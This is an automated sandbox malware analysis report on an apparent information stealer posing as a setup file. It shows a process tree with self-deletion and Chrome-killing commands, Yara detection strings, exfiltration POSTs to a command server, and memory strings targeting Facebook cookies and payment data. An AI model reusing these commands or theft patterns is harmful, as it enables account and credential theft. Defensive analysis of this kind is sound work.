Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report FileSetup-v17.04.41.exe

Overview

General Information

Sample Name:FileSetup-v17.04.41.exe
Analysis ID:345937
MD5:b7234e4a9aaaacefa890535f8117c8fc
SHA1:24c4321111ff004105c14e29662682f16900de29
SHA256:a8fefe8e1f92a30d1cdd4e2e2afaacf08a02c8961f496ee16e89062417ec5f28
Tags:Stealer

Most interesting Screenshot:

Detection

Score:90
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Hides threads from debuggers
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
Registers a new ROOT certificate
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a Chrome extension
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains strange resources
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

Startup

  • System is w10x64
  • FileSetup-v17.04.41.exe (PID: 5292 cmdline: 'C:\Users\user\Desktop\FileSetup-v17.04.41.exe' MD5: B7234E4A9AAAACEFA890535F8117C8FC)
    • msiexec.exe (PID: 3488 cmdline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • 6852B33702F6B3BD.exe (PID: 2124 cmdline: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe 0011 installp3 MD5: B7234E4A9AAAACEFA890535F8117C8FC)
      • 1611946678493.exe (PID: 5404 cmdline: 'C:\Users\user\AppData\Roaming\1611946678493.exe' /sjson 'C:\Users\user\AppData\Roaming\1611946678493.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)
      • ThunderFW.exe (PID: 1036 cmdline: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' MD5: F0372FF8A6148498B19E04203DBB9E69)
      • cmd.exe (PID: 3688 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 5240 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • 6852B33702F6B3BD.exe (PID: 4640 cmdline: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe 200 installp3 MD5: B7234E4A9AAAACEFA890535F8117C8FC)
      • cmd.exe (PID: 720 cmdline: cmd.exe /c taskkill /f /im chrome.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 3840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 6176 cmdline: taskkill /f /im chrome.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • cmd.exe (PID: 6568 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 6636 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • cmd.exe (PID: 5384 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\FileSetup-v17.04.41.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 4920 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
  • msiexec.exe (PID: 6028 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding E90BF9A81DF75408BCAEC738866B933F C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.261933148.00000000028E0000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000004.00000002.385937201.00000000027D0000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000005.00000002.290296269.0000000002810000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

SourceRuleDescriptionAuthorStrings
5.2.6852B33702F6B3BD.exe.2810000.5.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.6852B33702F6B3BD.exe.27d0000.5.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.6852B33702F6B3BD.exe.10000000.7.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
1.2.FileSetup-v17.04.41.exe.28e0000.5.raw.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
5.2.6852B33702F6B3BD.exe.2810000.5.raw.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
Click to see the 6 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeReversingLabs: Detection: 47%
Multi AV Scanner detection for submitted fileShow sources
Source: FileSetup-v17.04.41.exeVirustotal: Detection: 60%Perma Link
Source: FileSetup-v17.04.41.exeReversingLabs: Detection: 47%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeJoe Sandbox ML: detected
Machine Learning detection for sampleShow sources
Source: FileSetup-v17.04.41.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,4_2_1001F720
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: -----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLfprfltmOHTzR+m/YBEdzgxnHwXgNPal/ctcPxx2L3by8pqL9tpgSgEYEeIp+DMIOFvh0gY6/gt7hqXrairRK8XHrlfJJxucOxb54FThG8Apu+IsnhM3AKABV2b3P5PeloDtfi8E0TdADPHr0kgcvS7YUOm7Z/hoSXkJsrwXBOQIDAQAB-----END PUBL1_2_00412872
Source: FileSetup-v17.04.41.exeBinary or memory string: -----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLfprfltmOHTzR+m/YBEdzgxnH wXgNPal/ctcPxx2L3by8pqL9tpgSgEYEeIp+DMIOFvh0gY6/gt7hqXrairRK8XHr lfJJxucOxb54FThG8Apu+IsnhM3AKABV2b3P5PeloDtfi8E0TdADPHr0kgcvS7YU Om7Z/hoSXkJsrwXBOQIDAQAB -----END PUBL

Compliance:

barindex
Detected unpacking (creates a PE file in dynamic memory)Show sources
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeUnpacked PE file: 5.2.6852B33702F6B3BD.exe.2810000.5.unpack
Uses 32bit PE filesShow sources
Source: FileSetup-v17.04.41.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Uses new MSVCR DllsShow sources
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.4.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611946678493.exe, 0000000B.00000000.271662434.000000000040F000.00000002.00020000.sdmp, 1611946678493.exe.4.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.4.dr
Source: Binary string: atl71.pdbT source: atl71.dll.4.dr
Source: Binary string: atl71.pdb source: atl71.dll.4.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.4.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.4.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.4.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.4.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.4.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.4.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 0000001D.00000000.367402647.0000000000BFC000.00000002.00020000.sdmp, ThunderFW.exe.4.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.4.dr
Source: Binary string: e:\KINGSOFT_DUBA\Build\Build_Src\kisengine\kisengine\product\win32\dbginfo\kinst_exe.pdb source: FileSetup-v17.04.41.exe
Source: Binary string: msvcr71.pdb source: msvcr71.dll.4.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: gdiview.msi.1.dr
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: z:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: x:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: v:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: t:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: r:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: p:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: n:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: l:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: j:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: h:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: f:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: b:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: y:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: w:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: u:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: s:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: q:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: o:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: m:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: k:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: i:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: g:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: e:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: c:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: a:Jump to behavior
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004C2B17 __getdrive,FindFirstFileA,_strlen,_IsRootUNCName,GetDriveTypeA,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,___dtoxmode,GetLastError,FindClose,1_2_004C2B17
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_1001A170 FindFirstFileA,FindClose,4_2_1001A170
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_0041E22C GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,1_2_0041E22C
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior

Networking:

barindex
Uses ping.exe to check the status of other devices and networksShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: global trafficHTTP traffic detected: GET /info_old/ddd HTTP/1.1Host: 84CFBA021A5A6662.xyzAccept: */*
Source: global trafficHTTP traffic detected: POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 84Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 677Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/g HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 1405Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: GET /info_old/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: GET /info_old/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: GET /info_old/ddd HTTP/1.1Host: 84CFBA021A5A6662.xyzAccept: */*
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exeString found in binary or memory: _time":"13245951499607797","lastpingday":"13245947458072931","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@&#064;@&#064;https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 